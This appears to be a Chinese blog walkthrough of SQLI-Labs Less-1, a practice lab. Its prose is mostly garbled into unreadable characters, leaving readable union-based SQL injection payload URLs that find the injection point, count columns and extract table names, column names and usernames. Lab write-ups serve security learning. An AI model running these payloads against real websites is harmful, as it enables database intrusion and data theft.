【SQLI-Lab】-Less1
发布日期:2021-05-11 01:40:19 浏览次数:15 分类:精选文章

本文共 1983 字,大约阅读时间需要 6 分钟。

���������������������������GET���������������������������

������������GET���������������

GET������������������������������URL������������������SQL������������������������������������������������������������������������������������������������������������������������������payload������������������������

������������������

  • ���������������������������������������������id������������������http://192.168.135.149/sqli/Less-1/?id=1'���URL������������������������������
  • ������������������������������������������������SQL���������������������������������������������������������
  • ������������������������

  • ���������������

    • ������������������������http://192.168.135.149/sqli/Less-1/?id=1'
    • ������������������������������http://192.168.135.149/sqli/Less-1/?id=1' and 1=1 -- 1
  • ���������������

    • ������group by 3���������http://192.168.135.149/sqli/Less-1/?id=1' group by 3 -- 1
  • ������������������������

    • ������������http://192.168.135.149/sqli/Less-1/?id=-1' union select 1,database(),3 -- 1
    • ������������http://192.168.135.149/sqli/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1
  • ���������������

    • http://192.168.135.149/sqli/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --
  • ���������������

    • ���username���http://192.168.135.149/sqli/Less-1/?id=-1' union select 1,(select group_concat(username) from security.users),3 -- 1
  • ���������������������

  • ������������������������������������������������������������������������������', '',), '',"),������������������������������������
  • ���������������������������������������������payload������������������������������������������������
  • ���������������������������������payload������������������������������������������������������������������������
  • ���������������������������������������������GET���������������������������������������������������������������payload������������������������������

    上一篇:【SQLI-Lab】-Less2
    下一篇:【SQLI-Lab】靶场搭建

    发表评论

    最新留言

    很好
    [***.229.124.182]2025年04月21日 18时55分17秒